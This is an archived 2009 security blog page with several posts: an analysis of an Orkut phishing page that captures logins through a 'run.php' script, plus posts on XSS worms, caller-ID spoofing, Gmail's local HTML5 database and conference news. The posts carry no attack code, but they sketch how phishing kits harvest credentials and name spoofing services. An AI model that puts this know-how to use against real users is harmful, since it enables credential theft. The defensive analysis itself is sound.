Thursday, April 30, 2009

Phishing - Never Ending Attack

To define it, Phishing is an act of tricking someone into providing their confidential information such as usernames, passwords and other sensitive information. It is typically carried out via fraudulent e-mail messages or on websites claiming to be legitimate sites seeking identifiable information. It is not a new attack vector but it is still widely on the web. Actually, Phishing takes advantage of social engineering as an attack vector to lure victim to enter sensitive information into the fake or malicious websites but the victim will end up in losing his/her private information.

It looks like phishing will be a never-ending threat for web security going forward. There are number of popular websites being targeted for phishing to steal sensitive information. The example included here is for a very popular social networking site called Orkut. Last night, I saw an update from one of my friends on Orkut, which included headlines such as “New Orkut Version”, “Orkut New Theme” etc with some links provided. Looking at the links, I came to know that they must be fake websites used for phishing. Here is the screenshot,




Browsing those links led to a fake login webpage which looks very similar to the original Orkut login page. Closer inspection of the domain makes it clear that the phishing webpage is hosted on a free web hosting site. There are many free web hosting sites present on the internet so it is very easy to create a free fake domain and host the fake webpage’s on those sites. Being a security researcher I then quickly opened the source of the webpage and found original login form action URL is changed to “run.php” and method is changed to a GET request. Everything else was as I expected it to be. Then when I entered a fake username and password, the page sent the GET request with all parameters needed including redirect link to the Orkut home page. Here is the wireshark packet capture for the GET request and response from the “run.php” page,









Interestingly, if you look at the response from the “run.php” webpage, you will see the page uses ‘document.location.href’ to redirect it to the original login page appending all parameters needed to login including clear text Email and Password. This clearly shows that the “run.php” added this script dynamically by adding provided email and password information. Don’t worry; we have entered fake information so nothing was leaked. Remember, Orkut never uses clear text parameters in the original URL.

The webpage does not just steal information and redirect you to the original login page where you have to re-enter your username and password but it actually appends all necessary parameters to the original login URL. This means that when you enter a correct username and password you will be directly logged into Orkut and also have left your private information on the fake website. You will of course be asked for a username and password by Orkut if you entered fake information as I had. Here is another screen shot of how the URL looks like,


There are numerous phishing websites present on the Internet targeting very popular sites. The fake webpage’s used are very similar to the original ones with few changes in the source code. It is very easy to create such pages and host them on a fake website. To host such fraudulent websites all that an attacker needs is to create a fake login page similar to original one and add some server side code (e.g. the php page discussed above) to steal private information.

The above discussion is just one example of phishing. The trick used here to redirect the victim to the original website appending username and password parameters will definitely hide the fraudulent website as you will be end up at the original website. But remember the request is actually sent from the “run.php” script leaving your information on the fake website.

You will find many such phishing sites while surfing. It is becoming very easy for script kiddies to host such fake webpage’s because plenty of information on how to conduct an attack and even source code is readily available. Below is the screen shot found in one of the forum,







This was found in one of the forum where the author has uploaded fake webpage’s for 34 popular website like AOL.com, Gmail.com, eBay.com and many more. The source code even comes with clear instructions on how to use and host these fake webpage’s. The webpage’s used look like exact copies of the original websites. Below are more fake webpage’s created for many popular websites including Yahoo, MySpace etc.









Phishing is a trivially easy method to conduct online identity theft. It can be used to steal not only personal but financial information as well. It is also very easy to attract a large victim’s towards phishing website through emails, messages, scraps etc. Most of the emails prompt victim to visit the link provided and enter private information on the fake website.

You can avoid yourself being phished as per few recommendations,

  • Check the website address in the address bar of the browser. Most phishing websites are hosted on free web hosting sites.
  • If you find a suspicious phishing website check the source code of the webpage and try to find login form information and compare it with original website source.
  • Never click on any link from email you receive from unknown trust. Remember, the sites of financial institutions, banks, auction sites, social networking sites etc never send email asking users to update or change information.
  • Be extra careful before entering financial information
  • Report phished site to the original website team when you encounter them.

That’s it for now.

Umesh

Monday, April 27, 2009

RSA Wrap-Up

Last week was of course yet another edition of our industry's mega conference, known as RSA. The see-and-be-seen conference where we all show up to spend far too much money to erect and decorate a booth because we must. It is however, the single best place to meet with the many individuals that we've done business with via telephone and email and finally get to shake their hands. The 2009 edition of RSA clearly illustrated a couple of things for me - the recession is real and the cloud has arrived. Did the former play a role in driving the latter? Quite possibly.

Recession Blues

It was obvious to most that traffic on the expo floor just wasn't what it had been in previous years. I too heard rumors that attendance was down between 12-13 percent, but agree that it felt like more than that. Not a surprising statistic when even the largest employers continue to announce layoffs and budget cuts. I was also struck by the lack of the 'new, new thing'. I generally spend time walking the expo floor, looking for interesting start-ups that I haven't heard of before which have an intriguing business model and I walk away saying 'I wish I'd thought of that'. They tend to have the smallest booths and are stuck in a back corner but make up for their lack of marketing muscle with a great new product or service. This year however, I walked away disappointed. Perhaps I was just too busy to spend adequate time at the expo, but I suspect that we're seeing the effects of the now well publicized drop in investment capital. While that's bad news for those seeking funding, it's welcomed by those that have managed to find required cash as they're likely to face less competition.

A Silver Lining?

I expected heading into the conference that 'cloud security' would be the catch phrase that would rule the day. Looking at the various product launches and flipping through the program guide it seemed as though everyone wanted to ensure that they were associated with 'the cloud' in some shape or form. A full 23 presentations dealt with cloud security. It was also clear that there's plenty of confusion surrounding what the cloud really is. The term 'Cloud Security' is also causing confusion as it is being used interchangeably to describe both the security requirements of generic cloud computing initiatives and security services delivered in the cloud. Perhaps companies such as Zscaler should stick with 'Security as a Service' to describe what we do. Fortunately, industry initiatives, such as the Cloud Security Alliance (keep reading) are emerging to help define this emerging space.

Highlights

I'd like to thank Dave Cullinane (eBay), Arun Singh (Wipro) and John Ryan (IBM) for participating on my panel entitled Silver Lining: Debating the Merits of Cloud Security - A Customer Perspective. All three panelists are to some degree both consumers and producers of cloud security services so they brought a wealth of knowledge to the table. It's clear that Security as a Service offerings have a great deal to offer, especially during a recession but the race has only just begun. Customers, while accepting of the tradeoffs inherent in a cloud model are demanding powerful functionality and a low price point. It's up to us to deliver and for those that succeed, there is no shortage of demand. Our CEO, Jay Chaudhry also participated in a great panel on Cloud Security, which turned out to be standing room only.

On Wednesday, Jim Reavis officially launched the Cloud Security Alliance (CSA), a non-profit organization that is bringing together some of the best and brightest in our industry to help define cloud security. The CSA mission statement is to "promote the use of best practices for providing security assurance within Cloud Computing, and provide education on the uses of Cloud Computing to help secure all other forms of computing". I'm honored to be one of the founding members and to have contributed to the initial content including the Security Guidance for Critical Areas of Focus in Cloud Computing document released at RSA.

And what RSA would be complete without the plethora of parties to wine and dine prospects (or perhaps to just get rid of a little funding). I'm pleased to say that the recession did not seem to dent the enthusiasm of the party organizers. Two of my personal favorites were the WASC Meetup and the Security Blogger Meetup. While the vendor parties are great, nothing beats the chance to share war stories with industry colleagues over a few beers.

'til next year!

- michael

Friday, April 24, 2009

GeoCities: Rest In Peace

Yahoo finally shut off life support to the "should have been dead by now" site GeoCities.com. GeoCities had a noted time in history, serving to provide a free means for all those folks who felt they needed needed to jump onto the Internet bandwagon and have a personal website to express themselves. In this age of blogs, social networking, and instant messaging, GeoCities is both a technological and sociological relic.

GeoCities has always had some seedy areas, but lately it seems it mostly served the dark side of the Internet, being
a favored platform of spammers, botnets, and malware writers. Sophos mentioned that GeoCities and Blogger require very little identification in order to set up a site...which is why they see a lot of malicious content on those to internet properties. Sites like malwaredomainlist.com show a fair amount of known malware URLs hosted on GeoCities. Google Safe Browsing reports over 700 encountered pieces of malware, worms, and Trojans on GeoCities pages in the last 90 days.

Next on the "do not resuscitate" list is
AngelFire.com, owned by Lycos. Google Safe Browsing reports it as having about half the amount of malware as GeoCities. But, to be fair, Google reports that Blogspot.com contains about four times more malicious content than both GeoCities and AngelFire combined. So it's all relative. Closing GeoCities will help remove some malware breeding grounds off the Internet, but it is only a dent in the grand scheme of things.

But hey, every little bit helps, right?

Until next time,
- Jeff

Friday, April 17, 2009

We Used to Laugh at XSS

I remember at Defcon 10 in 2002, when members of GOBBLES took to the stage for their much anticipated talk about the state of the security industry. The talk turned out to be a largely incoherent, but entertaining rant and I still remember the Unix Terrorist (aka Stephen Watt) poking fun at the many cross-site scripting (XSS) holes that people had begun to publish advisories for. At the time, he was right. XSS wasn't a high risk vulnerability. It wasn't being leveraged by attackers for anything meaningful and could be easily thwarted by simply avoiding the use of JavaScript. Well...things have changed. Today, Watt faces some serious charges due to his alleged involvement in the TJX breach and XSS vulnerabilities have emerged as a legitimate threat.

What changed?

Last weekend, a web based Twitter worm (aka Mikeyy/StalkDaily worm) hit the media. It was the work of Michael Mooney, a 17 year old, self described 'bored developer', who was brazen enough to brag about the attacks after the fact. He may be regretting the publicity at this point, now that his systems have been publicly hacked and he's no doubt heard about how Samy Kamkar was rewarded for his efforts after a similar attack on MySpace with a felony conviction. However, thus far it seems to have landed him a job as opposed to jail time.

What has happened to turn XSS from amusing interweb trickery into a valuable attack vector? In short, the web has changed, but unfortunately security is lagging behind. In general, I see the following four factors that deserve credit:

1.) Prevention [should be] the best Medicine - We've known about the dangers of XSS for at least a decade now, and yet it remains the most prevalent web application vulnerability out there. Efforts to educate developers has produced limited results, not in my opinion because developers don't care, but because the population of web developers is growing at a tremendous pace, thanks to point 'n click development environments. We've empowered millions with the tools to develop web applications but we've also made it far to easy to produce an insecure application.

2.) The Ubiquity of JavaScript - We used to tell users to avoid XSS by avoiding JavaScript. That was a reasonable statement in 2001 but good luck surfing the web today without a JavaScript enabled browser. You'd be better off using a text based browser such as lynx. With the advent of AJAX enabled sites and the demand for increasingly interactive, user-friendly web content, you'd be hard pressed to find a JavaScript free site that is actually used by anyone.

3.) The Power of Social Networking - Web based worms such as the Twitter worm have one inherent limitation - they live within the ecosystem where they were created. While this would be significant for a seldom used web application, with social networking sites measuring active users in the hundreds of millions this is hardly a limitation at all.

4.) Sky's the limit - While we tend to think of XSS as a way to steal session credentials, such attacks are limited only be the creativity of the researchers/attackers that pursue them. Anton Rager developed XSS-Proxy as a means to remotely control XSS attacks. Billy Hoffman turned a browser into a vulnerability scanner via XSS. Jeremiah Grossman demonstrated gaining insight into someone's browser history and at Black Hat DC this year, I talked about how XSS can be used to conduct client-side SQL injection. The list goes on and on...

The Twitter and MySpace worms were largely benign. When traditional worms began spreading, they were largely benign as well, a proof of concept to prove that something could be done. Once that hurdle had been overcome, criminals moved in to profit and I don't expect the outcome to be any different this time around either.

We've set the bar far too low for attackers. Well known vulnerabilities such as XSS remain far too prevalent, despite having been around for years. It's encouraging to see Microsoft stepping into the fray by adding XSS prevention to Internet Explorer 8 and I hope that other browser vendors will do the same. While the root cause lies with web app developers, it is clear that focusing on developers alone will not fix the problem. The interconnected nature of the web requires that all players pitch in to reduce risk to end users.

- michael

Public Service Announcement: EFF Coder's Rights Project

I ran across this today, and thought it was just too valuable to not make mention of. The EFF has a "Coder's Rights Project" that includes FAQs and guides related to the legalities of security disclosure, reverse engineering, and ethical hacking/testing for security vulnerabilities. They are absolutely fantastic layman summations of all the legal nuances (US-centric) that you should be aware of while pursuing any of these legally grey endeavors. The FAQs and guides concisely lay out how the various US laws, such as DMCA, copyright, and Computer Fraud and Abuse Act can come into play during security testing, disclosure and reverse engineering efforts. The EFF material also provides very good advice regarding how to reduce/limit your risk.

If you had any doubt, it should be thoroughly dispelled by the time you are finished reading the material on EFF: testing software and web sites for vulnerabilities is NOT a legally granted right. The law does NOT recognize the concept of "ethical" hacking. As such, the true key to ethical hacking is the confidence that the person you are hacking is not going to legally pursue you after your activities. Hack only when you have permission to do so. Without permission, you are putting yourself legally on the hook regardless of your morals and non-malicious intentions.

If you are still steadfast in your desire to perform security tests without explicit permission in a manner that you feel is morally clean, then you need to ensure that you keep all your actions above board and follow through on your non-malicious intentions. If you do find a problem, report it immediately. Taking the time, for example, to dump the entire user database along with passwords and play around with it for a few weeks before you finally disclose the problem is not going to be seen as aligned with clean intentions. Also keep in mind that law enforcement agencies
are very keen on people trying to hide their identities while undergoing these types of activities; using anonymizers and the like is not looked upon favorably and as such could push your activities to the 'blackhat' end of the spectrum rather than the 'whitehat.' If your intentions are good and you have nothing to hide, then don't hide it.

Above all else, if there is any doubt, then just don't do it.

Until next time,
- Jeff

Wednesday, April 15, 2009

Anatomy of a Straight Answer

You're a software developer, going along minding your own business when some crazy security geek (hopefully a coworker rather than a stranger who just stepped in from the Net) has the nerve to discover that your code is broken. There is, he says, a hole. "How bad is it?" you ask. "That depends," he usually says, and continues with a long treatise covering many hypothetical possibilities (but always veering away from firm opinions). Maybe he asks 20 questions about how your customers deploy your product (most of which you can't answer) . Only if he already knows all about the deployment environment and what your customers are doing with the product will he give you a straight answer, and even then it'll probably sound like an answer plus lecture or disclaimer. What is up with that? Why doesn't anybody seem to be able to give a straight answer about how bad a vulnerability is?

The problem, from the security geek's perspective, is that "it depends" is the straight answer. "How bad is it?" depends on at least two things: expectations and environment.
  • Expectations because, if Alice believes she is using world-wide Internet photo publishing software, and later it turns out that anyone on the Internet can see the snapshots she added to her photo library, she is unlikely to call this a security problem even if said Internet user can use a technique the software developer didn't intend. But if Alice believes she is using software to share photos with her friends over the Internet, and later her prospective employer Googles her and finds pictures from that one party because the photo sharing site has an anonymous FTP server on the same box, she will be quick to cry security hole.
  • Environment because there's nothing wrong with an anonymous FTP server, and nothing wrong with an access-controlled photo sharing site, but put them together in the wrong way, and Alice is out of a job and hopping mad.

Expectations and deployment environment are especially important in evaluating design flaws. It's a design flaw when the system is implemented exactly the way the designer intends, but the design allows unauthorized users to do more than the system owners or legitimate users expect. Given a design and some expectations, how bad the design flaw is (and even whether it exists) is entirely a function of the deployment environment. Likewise, given a design and a deployment environment, the severity of the design flaw (if any) depends entirely on stakeholders' expectations. So, if you ask a security geek how bad a design flaw is, he is going to spend a lot more time looking into stakeholders' expectations and the environment than into the system you asked him to analyze. This may seem weird, but he's looking there because that's where the answers are.

(In the case of an implementation flaw, proportionally more time may be spent figuring out the direct, technical implications of the flaw, mostly because by the time you've identified the existence of a design flaw, you usually have a pretty good idea how it affects this system in isolation. After that, the analysis is the same as for a design flaw. Mitigation, on the other hand, is usually easier since you can fix the bug without changing anything for your legitimate users or relying on protection in the environment. )

-- Brenda

Monday, April 13, 2009

Spoofing caller-ID: the new hacking inroad

It is amazing to see the number of bridged services that rely upon the source telephone address of an incoming call (supplied via caller-ID) or SMS message as a form of authentication. Maybe this made sense in the 90's when spoofing caller-ID was hard, and the most it would offer is accessing someone's voicemail without a PIN. But nowadays there are countless online services that allow SMS and caller-ID source spoofing (Spoofcard, Phonytext, etc). Pair this with the growing number of services offering telephony or SMS integration, and you start to have a problem.

Let's review some recent examples of this situation in action.
Twitter was found to allow spoofed SMS messages to perform Twitter account actions/changes. The core problem was first identified nearly two years ago, but a recent variant allowed attackers to circumvent previously added safeguards. Twitter offers the option of using a PIN, but using a PIN impacts the ease of use and the overall user experience--so users do not jump at the opportunity to opt-in to this additional hurdle.

Google Voice has also had a fair amount of problems exposed, although some of the problems use different vulnerability vectors than the simple spoofed caller-ID/SMS. Spoofing caller-ID of a mobile phone configured for a Google Voice account allows an attacker to get into the Google Voice IVR system for that account and modify certain settings. Google has since closed these holes.

While we are talking about hacking telephone/SMS-related services, it is probably worth mentioning an
XSS bug found on Skype's website. The attacker can try the usual bag of tricks to get a user to click on an XSS-ified link and gain access to the Skype session cookie. Fortunately, it seems Skype session cookies expire after thirty minutes...making the window of exploit opportunity it bit more difficult for an attacker to hit.

Overall, it is important for companies looking to add SMS/telephony bridged capabilities to their existing services to understand that caller-ID and SMS source information is not reliable for authentication purposes. Period. It is no different than asking a user for their username without the additional authentication aspect of a password; it creates an "on your honor" system which is ripe for abuse.

Until next time,
- Jeff

Why Are Two Holes Worse Than One?

I'm giving a talk at Metricon next week. One of my more successful pre-talk strategies is to corner whatever non security experts I can find and practice explaining what I am going to talk about. By the time I can successfully explain a concept to my doctor's accountant, a freelance outdoor photographer, and a graphics programmer (this week's semi-randomly selected crew of listeners), I usually have a pretty good idea of which explanations work. Plus, talking to people outside my field is a great way to practice answering unexpected and frequently awkward questions in real-time. Like "why are two security problems worse than one?" "Of course they're worse; there are two of them" is not a satisfying answer. Now that I've had a bit more time to think about the question, I even recall a conversation with another security geek who argued fairly passionately that two similar holes are not worse than one.

For discussion purposes, let's assume the two vulnerabilities are independent (i.e. not caused by the same design problem or line of code), but very similar (e.g. they have identical CVSS vectors), and consider things the second vulnerability might affect:

Discoverability

The second vulnerability will not affect the attack surface (i.e. the area an attacker with no knowledge of the system searches to discover vulnerabilities), but it will affect the number of vulnerabilities an attacker could find. Therefore, it is more likely that an attacker will find one of the vulnerabilities, and two holes are worse than one.

Mitigation costs


If two vulnerabilities allow access to the same target, from the same starting state, one must mitigate both vulnerabilities to prevent access to this target from this starting state. But if they are independent, they must be mitigated separately. Therefore, it will cost more to prevent access to the target, and two vulnerabilities are worse than one.

Throughput

Depending on the vulnerabilities in question, the second vulnerability may allow more attackers to attack simultaneously than the first one alone. If this were the case, two vulnerabilities would be worse than one. In practice, attackers are not usually trying to fully load the system with attacks, so even if it's theoretically worse, it may not be worse in practice.

Reachability

For reachability purposes, it doesn't matter how many ways the attacker can do it, it only matters whether the attacker can do it. Therefore, two holes with identical CVSS vectors are not worse than one. This makes a lot of sense from the perspective of a goal-oriented attacker with knowledge of the first vulnerability, but less sense from the perspective of a defender.

I may have left out some relevant philosophical issues, but for myself, I'm satisfied enough to continue thinking that two vulnerabilities are worse than one.

-- Brenda

Tuesday, April 7, 2009

Gmail and HTML 5

If you accessed Gmail today on your iPhone or Android based phone using a web browser, you will have noticed some differences. It has a few more bells and whistles but of particular interest is the addition of offline access. Gmail went offline a few months ago thanks to Gears (formerly Google Gears). Mobile Safari on the iPhone doesn't however have a Gears plugin, so how was this accomplished? The answer lies in the yet to be finalized HTML 5 specification and specifically the client-side database storage functionality that it calls for. While HTML 5 remains a work in progress, WebKit based browsers, such as Safari and Mobile Safari have already adopted database storage. This permits developers to create and subsequently read from/write to a fully capable, locally stored, relational database which is accessed via the web browser. I view today's Gmail release as a watershed moment for offline web applications as this is the first mainstream web application that I've seen using the technology.

I view offline access as an inevitable next step for web applications. We have continued to blur the line between desktop applications and their web based counterparts. Technologies such as AJAX, Flash, Silverlight, etc. have continued to push the limits on what browser based applications are capable of but despite all of the added functionality, web apps suffer from one inherent limitation - they disappear when you go off the grid. Well, that's about to change.

Local Gmail Storage

Since the iPhone (un-jailbroken) doesn't permit raw file access, I'll walk through Gmail's use of HTML 5 via Safari on a standard OS X platform. First off, in order to get Google to deliver the HTML 5 version of Gmail, we'll change the User-Agent header to match that used by the iPhone as follows:

Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11 Safari/525.20

Now when we visit Gmail, the iPhone version of the app is displayed. At this point, local database storage has automagically been setup. One concern that I have here is that the end user is not informed of this. Gears will at least require the end user to acknowledge that a local copy of data is being set up. While I'm not a fan of leaving security decisions in the hands of the average end user, I do feel that users should be informed that they're now carrying around a local copy of their email, which could be accessible if their phone were ever lost.

Now let's see exactly what has been stored locally. On OS X, the database is set up in the following location:

/Users/[username]/Library/Safari/Databases/http_mail.google.com_0/000000000000000x.db

Separate databases will be established for each separate Gmail account accessed, with each receiving an incremented numerical value. The database leverages the SQLite format. As such, database content can be viewed with an application such as the SQLite Database Browser. Below are details the tables that are created, along with a description of the data contained within:
  • action_queue - Purpose unclear
  • cached_contacts - Top 20 contacts, including email addresses and names
  • cached_conversation_headers - Abbreviated content from email messages including the full subject, sender's name and first sentence or two of the message
  • cached_labels - User defined labels which can be assigned to email messages
  • cached_messages - Similar to cached_conversation_headers
  • cached_queries - Purpose unclear
  • config_table - Application version number
  • hit_to_data - Purpose unclear
  • log_store - Purpose unclear
Security Concerns

I've commented in the past that Gears and HTML 5 represent fantastic technologies but as with most new technologies, when poorly implemented, they can lead to increased security risk. Applications communicate with local data storage via JavaScript calls. The calls are restricted by a same origin policy to ensure that only the application which created the data, can then subsequently access it. However, as I demonstrated at Black Hat DC this year, when sites are affected by XSS vulnerabilities, a remote attacker could gain access to local database storage and perform client-side SQL injection attacks. Now fortunately, I have no reason to believe that Gmail is currently suffering from any XSS vulnerabilities, but they certainly have numerous times in the past. What I'm more concerned about is the fact that XSS remains an all too common vulnerability and as other developers adopt local database storage either via Gears or HTML 5, we are sure to see plenty of vulnerable sites, which will place end users at risk. This isn't just a privacy concern, it's also a data integrity issue as an attacker can write to the database just as easily as they can read from it.

Overall, I feel that the HTML 5 specification has a great deal to offer and it's encouraging to see some early adoption. It will be up to developers to ensure that powerful features such as local database storage do not unnecessarily expose end users to increased risk.

- michael

Friday, April 3, 2009

Re-blogging headlines – March/April

It felt like a whole day was lost due to April 1st, the day many Internetizens feel they will be unique in their effort to fabricate ruse to demonstrate their cleverness. The Internet already has a low signal-to-noise ratio; on April 1st, the few valuable sites that exist seem to actively collude to drive the ratio even lower. One has to wonder how many man-hours were spent on CADIE the panda-loving artificial life form and facial gestures for web browsers. At least Mr. Astley continued to receive further free marketing through many gimmicks.

Anyways, it seems the world survived the Conficker worm. Many media outlets poised April 1st as nothing less than the end of the online world. Perhaps it was the biggest April Fool's joke of all time, getting so many agencies to report with veracity on something that didn't happen. And while it sounds like the making of another April 1st prank, the
"Conficker eye chart" is actually a real tool. Apparently Conficker blocks access to certain security vendor sites, and the eye chart will make that readily apparent when your browser tries to fetch graphics from said sites. Quite clever.

There have been a lot of cloud-centric headlines recently. The
Cloud Security Alliance was launched, of which Zscaler is an active participant. There is a LinkedIn group available for general discussion, but it seems things will really start moving around the time of RSA Conference. The Open Cloud Manifesto group (with a LinkedIn group as well) also launched recently. They are trying to promote open standards for cloud vendors. On the one hand, this is a great plan as most cloud technology is home-grown; current implementations are often proprietary systems and thus have very minimal opportunity of interoperability with other clouds. On the other hand, the pioneering cloud vendors are currently deriving large amounts of market advantage simply from the fact that they have tackled the architecture and implementation hurdles others need to surmount to compete. So I don't predict a lot of vendors willingly jumping onto the openness bandwagon until cloud platforms become ubiquitous and commonly obtainable...meaning the market advantage of merely possessing the technology is minimized or removed entirely and commoditization sets in. And despite all this recent excitement over clouds, I feel I need to provide honorary mention of Craig Balding over at www.cloudsecurity.org, who has been talking about cloud security for quite a while now. It's nice of us to finally start catching up with him.

I've blogged relatively recently about Google, Gmail, beta status, and their cloud technology (in my posts
"Changing a tire while going 60mph" and "Big, white, puffy clouds can still evaporate"). There were some recent articles which address some of the points I raised. First was the Ars Technica interview of Gmail product manager Todd Jackson, who addressed the whole Gmail 'beta' moniker despite Gmail celebrating its fifth anniversary. And then Google unveiled some details relating to their hardware designs, which include using localized batteries in the server chassis instead of external UPS battery backups. Apparently internal batteries can achieve better efficiency than a UPS can offer; also interesting was their 12-volt only power supply. But there were two much broader takeaways from that story that appealed to me. First was the notion that Google's investments into platform innovations, even if producing only a minute improvement, can still realize a quick return due to the sheer mass of Google's infrastructure. That's a very unique position to be in, because Google can derive advantage from micro improvements that other corporations just simply do not have the economy of scale to realize a return. Second is the statement that Google is currently obtaining efficiency levels that the EPA hopes will be commonly possible in 2011, after additional "advanced technology" is made available to help realize that goal. That is a pretty big tip of the hat to Google and their level of innovation; apparently they are at least two years ahead of where everyone hopes to wind up down the road. Maybe we should ask them what their lottery number choices are...

Until next time,
- Jeff